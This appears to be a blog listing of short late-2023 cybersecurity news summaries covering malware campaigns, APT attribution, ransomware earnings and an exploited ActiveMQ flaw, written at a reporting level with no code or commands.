December 13, 2023 at 07:12AM Malware analysis involves examining network traffic and overcoming common challenges. Tools like a man-in-the-middle (MITM) proxy aid in decrypting HTTPS traffic, revealing details of malicious activities. FakeNET can identify malware families, and a residential proxy helps bypass geo-restrictions for analyzing evasive malware. Utilize these tools in the cloud-based ANY.RUN sandbox … Read more
December 11, 2023 at 11:08AM Researchers have linked the Sandman threat group, known for cyberattacks on telecom providers, to a growing network of Chinese government-backed advanced persistent threat (APT) groups. This assessment by Microsoft, SentinelLabs, and PwC reveals shared practices and overlaps in malware development, emphasizing the need for collaboration within the cybersecurity community. From … Read more
December 7, 2023 at 01:54AM A new Linux trojan named Krasue, discovered targeting Thai telecoms since 2021, offers attackers persistent network access. Utilizing rootkits and evading detection with innovative tactics, its origins and deployment methods remain unclear. Similarities with XorDdos malware suggest a possible common creator. Security analysts stress the need for ongoing vigilance. Key … Read more
December 5, 2023 at 03:12AM A new cyber threat, AeroBlade, targeted a U.S. aerospace company in a suspected espionage attempt. The BlackBerry team identified the attack, which utilized spear-phishing, remote template injection, and a malicious VBA macro. Attacks started in September 2022 and became more stealthy over time, culminating in July 2023 with a reverse … Read more
November 30, 2023 at 08:24AM Since April 2022, the Black Basta ransomware group has amassed over $107 million, with at least 90 out of 300+ victims paying ransoms. Likely evolved from Conti, the group uses Qakbot for malware deployment and shares typical ransomware-as-a-service payment structures. Its breach of Capita sparked widespread legal action. Meeting Takeaways: … Read more
November 29, 2023 at 12:18AM A critical security flaw in Apache ActiveMQ (CVE-2023-46604) is being exploited to distribute the GoTitan botnet and PrCtrl Rat malware for remote control of infected systems. Threat groups like Lazarus are using the flaw to deliver various payloads, including DDoS bots and cryptojackers. Meeting Takeaways: 1. A critical security flaw … Read more
November 27, 2023 at 09:57AM Recently, a new variant of the multi-platform malware called ‘SysJoker’ has been discovered. It has undergone a complete code rewrite in the Rust programming language. This malware, initially documented in early 2022, operates on Windows, Linux, and macOS systems. The new variant has been linked to ‘Operation Electric Powder,’ believed … Read more
November 23, 2023 at 12:35PM The Zero2Automated malware analysis and reverse-engineering course is offering a Black Friday through Cyber Monday sale with a 25% discount sitewide, including gift certificates and courses. The course, started in May 2020 by Vitali Kremez and Daniel Bunce, provides over 25 hours of content and an online community with peers … Read more
November 23, 2023 at 08:24AM Shipping-themed email messages are being used to distribute the WailingCrab malware. The malware consists of multiple components and is associated with the threat actor TA544. It prioritizes stealth and utilizes hacked websites and platforms like Discord for communication. The newer variants of the malware use the MQTT protocol for command-and-control, … Read more
November 22, 2023 at 02:24AM The macOS information stealer, Atomic, is now being distributed through a malicious web browser update chain called ClearFake. This marks the first time a social engineering campaign intended for Windows has expanded to macOS. Atomic Stealer is a commercial malware that steals data from web browsers and cryptocurrency wallets. ClearFake … Read more